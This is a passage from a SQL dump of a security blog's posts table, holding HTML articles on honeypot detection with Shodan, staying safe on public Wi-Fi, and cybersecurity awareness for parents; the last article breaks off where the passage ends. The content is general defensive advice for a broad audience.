pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Unlocking the Potential of Honeypots for Blue-Team Defenders</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From the perspective of blue-team defenders (security professionals who focus on defense), honeypots offer several significant benefits:</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. 
Insight into Attacks</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Honeypots allow defenders to observe real-world attacks in a controlled environment. By analyzing the captured data, defenders gain deep insights into emerging attack vectors and hacking techniques.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Improved Security Measures</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The information collected through honeypots helps defenders identify vulnerabilities within their systems. This empowers them to develop stronger defenses and close security gaps that attackers might exploit.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Early Detection</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Honeypots act as an early-warning system, alerting defenders to malicious activity before it escalates to attacks on critical assets. This proactive approach enhances overall cybersecurity readiness.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Risks and Challenges of Honeypots</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Despite their many advantages, the effective use of honeypots also presents challenges. The ability to detect honeypots using tools like Shodan introduces new risks:</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. 
Exposure of Honeypots</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If hackers can identify a honeypot, they might avoid interacting with it altogether. This defeats the purpose of the honeypot, as it no longer serves as a useful decoy.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Manipulation of Defenders</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Worse still, skilled attackers might deliberately feed honeypots false or misleading data. By doing so, they could misguide defenders, redirecting their focus away from actual targets.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Evasion Tactics</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Knowledge of honeypots incentivizes attackers to develop sophisticated methods to bypass or neutralize these traps. This can make it difficult for defenders to achieve the level of insight they seek.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">A Double-Edged Sword</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The emergence of tools and techniques, such as Shodan\'s honeypot detection capabilities, touches on a broader question about the role of honeypots in cybersecurity. Are they more beneficial to defenders or to attackers?</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">On the defensive side, honeypots provide critical insights and a proactive defense mechanism. 
They empower defenders by offering insights into potential threats, which help strengthen defenses and mitigate risks to critical infrastructure.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">On the attacking side, knowledge of honeypots presents an opportunity to evade detection or mislead security teams. Skilled hackers who can identify honeypots effectively neutralize them as a defensive tool, diminishing their overall effectiveness.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Bigger Picture in Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ability to detect honeypots highlights the delicate balance between defenders and attackers in the world of cybersecurity. It underscores the constant, evolving dynamic where both sides are continually exploring new tools and strategies.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For defenders, the challenge lies in deploying honeypots strategically and remaining one step ahead of attackers. Proper configuration and maintenance are critical to preventing detection and maximizing the potential of honeypots. Meanwhile, attackers continue to develop new techniques to identify and evade honeypots, creating an ongoing arms race in cybersecurity innovation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The discovery of tools that can check if a public IP address is a honeypot underscores the complexity of the modern cybersecurity landscape. Honeypots remain a valuable tool for defenders, offering insights and bolstering defenses. 
However, their effectiveness hinges upon their ability to remain inconspicuous in the face of evolving detection methods.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding and leveraging resources like Shodan can tip the scales in either direction. For blue-team defenders, these tools offer unparalleled opportunities to learn and adapt. For attackers, they represent a chance to evade traps and refine their craft.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As cybersecurity professionals, it\'s our responsibility to stay informed, adapt to new developments, and refine strategies to maintain a secure digital environment. Honeypots, for all their advantages and challenges, continue to be a critical tool in this ongoing battle.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to dig deeper into the dynamics of honeypots and detection tools like Shodan? Explore more insights on cutting-edge cybersecurity practices and stay ahead of potential threats. Stay secure and stay informed!</p>', '', NULL, NULL, 1, 'draft', '2024-02-16 03:50:03', '2026-01-12 21:41:44', 'OSINT Tool', 'The Dual Nature of Shodan.io: Friend or Foe?', '', NULL),
(140, 'How to Stay Secure while using Public WiFi', 'how-to-stay-secure-while-using-public-wifi', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Public Wi-Fi networks are everywhere—coffee shops, airports, libraries—offering convenient access to the internet on the go. But have you ever stopped to consider whether these networks are safe to use? Unfortunately, public Wi-Fi networks tend to be inherently less secure than private, encrypted connections. If you\'re not careful, you could be putting your sensitive data, passwords, or even entire devices at risk.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding the risks—and taking proper precautions—can dramatically reduce your vulnerabilities. Whether it\'s by using a VPN or simply avoiding unknown networks, these safety tips can help protect your data while you\'re connected to public Wi-Fi.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Public Wi-Fi Networks Are Risky</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lack of Encryption</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Most public Wi-Fi networks are not encrypted, meaning data transmitted over these networks can be intercepted by attackers. Without encryption, any information you send, such as login details to your personal accounts, could be picked up by cybercriminals lurking on the network. 
This makes activities like online banking and accessing sensitive emails especially dangerous on public Wi-Fi. Note that most websites now use HTTPS, which still encrypts the content of your traffic even on an open network; what an attacker on the same network can still see is which sites and services you connect to, and they can try to intercept or downgrade any connection that is not properly encrypted, so treat every public network as hostile.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Shared Networks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the biggest problems with public Wi-Fi is that it\'s a shared resource. Everyone on the network is essentially using the same digital \"pipe,\" making it easier for attackers to target a large number of users at once. Maybe you\'ve heard about \"man-in-the-middle\" attacks. This is a technique where attackers intercept and even manipulate the communication between devices on the same network. Public Wi-Fi can also serve as a breeding ground for malware distribution: on a network that does not isolate clients from one another, an infected device can reach every other device directly and attempt to spread harmful software to them.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lack of Maintenance</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike private networks, public Wi-Fi often lacks a trusted administrator. This means that vulnerabilities or existing security issues could go unnoticed and unpatched by operators, creating a prime opportunity for attackers. Even the most cautious Wi-Fi user is at risk if the network itself is poorly maintained.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Essential Tips to Stay Safe on Public Wi-Fi</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Fortunately, there are ways to protect yourself while still enjoying the convenience of public Wi-Fi. 
Here’s how you can minimize the risks and safeguard your data.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Avoid Sensitive Activities</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you\'re using public Wi-Fi, it\'s best to steer clear of tasks that involve sensitive information. Avoid accessing things like online banking, entering your credit card details, or logging into personal accounts whenever possible. If it\'s something that could put your identity or finances at risk, save it for a secure, private network instead. If it can\'t wait, your phone\'s cellular connection or personal hotspot is generally a safer choice than an open network.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Use a Virtual Private Network (VPN)</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most effective ways to stay safe on public Wi-Fi is by using a VPN. A VPN encrypts your internet connection, creating an encrypted tunnel between your device and the VPN server. This makes it much harder for anyone on the local network to intercept or steal your information. Keep in mind that the VPN only protects that first hop: you are shifting your trust from the café\'s network to the VPN provider, so use a reputable paid service or your employer\'s VPN rather than a free app of unknown origin, and enable the kill-switch option if one is offered so that traffic is not sent unprotected if the tunnel drops.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Stick to Trusted Networks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Not all public Wi-Fi networks are created equal. It\'s best to use networks from reputable providers, such as those in hotels, coffee shops, or major retail chains. 
Always avoid unknown networks, as attackers often set up fake Wi-Fi hotspots (usually called \"evil twin\" or rogue access points—the term \"honeypot\" normally refers to a defender\'s decoy system, not an attacker\'s trap) to lure unsuspecting users.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Double-Check Network Names</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before connecting to a network, verify its name with the business or service provider. Cybercriminals often create malicious networks with names that closely resemble legitimate ones. For example, a café\'s network might be \"CoffeeShop_WiFi,\" while the fake network, set up by a hacker, might be \"Coffee_Shop_FreeWiFi.\" Keep in mind that a matching name is not proof of safety: an attacker can broadcast an exact copy of the legitimate network name, and your device may auto-join it, so this check only catches the sloppy fakes. The VPN and HTTPS advice still applies on a network whose name checks out.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Turn Off Sharing Options</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To prevent unauthorized access to your files or device, disable file sharing and other network-sharing options on your computer or smartphone. Most devices allow you to toggle sharing settings on or off when you\'re connecting to a new network. On Windows, choosing the \"Public\" network profile when you connect does this for you by blocking incoming connections; on any device, keeping the built-in firewall enabled adds the same protection. Keeping these options turned off will create an extra barrier against attackers attempting to access your personal files.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Update Your Software Regularly</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercriminals often exploit known security vulnerabilities in outdated software. To stay ahead of them, keep your operating system, apps, and antivirus software up to date with the latest patches. 
Updates often contain fixes for security vulnerabilities, so they’re an essential layer of defense when you\'re on public Wi-Fi, or any network for that matter. Ideally, install updates before you travel rather than accepting an update prompt that appears while you are on public Wi-Fi—fake \"update required\" pop-ups are a classic lure for getting malware onto a device.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Additional Safety Strategies</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you frequently use public Wi-Fi, consider implementing these additional safety measures for greater protection.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enable Two-Factor Authentication (2FA):</strong></b> Even if your password is compromised, 2FA provides an extra layer of security by requiring a second verification step. This could be a code generated by an authenticator app, a hardware security key, or a code sent to your phone by text message. Prefer an app or a security key where possible: SMS codes can be intercepted or redirected through SIM-swap attacks, although even SMS-based 2FA is far better than none.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Use HTTPS Websites:</strong></b> When entering sensitive information, make sure the website\'s URL begins with \"https://\". 
The \"S\" stands for secure, meaning the connection between your browser and the website is encrypted so that others on the network cannot read it. It does not mean the site itself is trustworthy, and if your browser shows a certificate warning while you are on public Wi-Fi, do not click through it—that is a common sign that someone is intercepting the connection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Log Out When Finished:</strong></b> If you\'ve logged into any accounts while on public Wi-Fi, be sure to properly log out and close your browser before disconnecting from the network. Then tell your device to \"forget\" the network so it does not silently reconnect to a network of the same name in the future.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Bottom Line</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Public Wi-Fi networks can be a lifesaver when you\'re on the go, but they come with significant risks. Poor encryption, shared resources, and lack of proper maintenance make these networks an attractive target for attackers. However, by following the safety precautions outlined above, you can significantly reduce your vulnerability to cyber threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To maximize your security, make a habit of using a VPN, avoiding sensitive activities, and keeping your software up-to-date. While public Wi-Fi will never be as secure as your private, encrypted network at home, a few smart steps are all it takes to protect your data while staying connected.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By being aware and vigilant, you can enjoy the convenience of public Wi-Fi without compromising your digital safety.</p>', '', NULL, NULL, 1, 'draft', '2024-01-02 03:25:21', '2026-01-12 21:41:44', 'Information Security', 'How to Stay Secure while using Public WiFi', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(141, 'Cybersecurity awareness for parents', 'cybersecurity-awareness-for-parents', 'Cybersecurity is the practice of protecting devices, networks, and sensitive information from cyber attacks, unauthorized access, and other forms of digital harm. As technology continues to advance and play a larger role in our lives, it\'s important to take steps to protect ourselves and our personal information online.\r\n\r\nI believe this is the best sample of how important cybersecurity is for kids.\r\n\r\n\r\n\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn\'t just for IT professionals or big corporations—it\'s essential for everyone, including families. Protecting personal information and keeping your loved ones safe online starts at home. Cyber threats are constantly evolving, and understanding their importance is the first step toward prevention.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s why cybersecurity matters for families and how you can get started with simple, practical steps.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Value of Personal Information</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercriminals are always on the lookout for personal information that they can exploit for their gain. Data such as financial records, documents, and personal photos are all highly valuable. They can use this information for identity theft, financial fraud, or other malicious activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think about the lists of passwords saved online, family vacation photos stored on your devices, or sensitive financial documents saved on a cloud platform. 
Without adequate protection, this data can easily fall into the wrong hands.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Protect Personal Info</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use Strong Passwords</strong></b>: Create unique passwords for every account and consider using a password manager to keep track of them.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Keep Software Updated</strong></b>: Always update your devices to the latest versions to protect against vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Be Careful About Sharing</strong></b>: Teach your family to think before sharing personal details online, especially on social media.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Real Consequences of Cyber Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber attacks are more common and damaging than most people realize. From phishing scams and malware to ransomware, there’s no shortage of tactics cybercriminals can use to access your personal information. 
The consequences can range from identity theft and financial loss to, in rare cases, physical harm.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Identity Theft</strong></b>: Hackers can impersonate you, open bank accounts in your name, or misuse your existing financial accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Financial Loss</strong></b>: Cybercriminals can drain savings accounts or make unauthorized purchases.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Reputation Damage</strong></b>: Personal photos and information posted online without consent can impact your or your children’s reputation.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Education is key. Parents need to be aware of these risks and teach their children to recognize warning signs, such as phishing emails or malicious links.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Children Are Particularly Vulnerable</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Children are often the easiest targets for cybercriminals because they may not understand online risks. 
Without guidance, they can fall prey to scams or overshare personal information.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For instance, a child could unknowingly download malware by clicking on an ad for a free game or responding to a message from a stranger in an online forum. The consequences can be devastating, exposing not just their devices but the entire family’s network to potential threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Teach Children Online Safety</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Monitor Online Activity</strong></b>: Supervise your child’s internet habits, especially when they’re young.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Set Boundaries</strong></b>: Limit screen time and restrict access to certain sites or applications.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Provide Guidance</strong></b>: Teach kids about safe browsing habits, such as avoiding suspicious links and not sharing personal information.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity in Education and Professional Life</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The importance of 
cybersecurity extends far beyond personal life. Schools and workplaces increasingly rely on technology, and cyber threats exist in these environments, too. Whether your child is submitting homework via an online portal or looking to join the workforce in a tech-powered industry, understanding cybersecurity is essential.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By equipping children with knowledge now, you’re not just protecting their current activities, but also preparing them for challenges they’ll face throughout their careers.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Practical Tips:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Educate children on secure file-sharing practices and how to recognize phishing attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Encourage the use of secure platforms approved by schools and workplaces.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Teach them why cybersecurity policies exist and how to follow them.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Starts with the Family</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just an individual responsibility—it’s a family affair. 
By making it a shared priority, everyone can contribute to a safer online environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lead by Example:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Practice Good Habits</strong></b>: Use strong passwords, update your devices regularly, and avoid questionable links.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Have Regular Discussions</strong></b>: Talk openly about cybersecurity with your family, making it a part of normal conversations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Create a Plan</strong></b>: Develop a family plan for handling potential security breaches, like what to do if an account gets hacked.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When every member of the family is informed and engaged, it becomes much easier to protect everyone.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Stay Updated, Stay Safe</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The world of cybersecurity changes quickly. New threats emerge daily, and it’s crucial to stay ahead. 
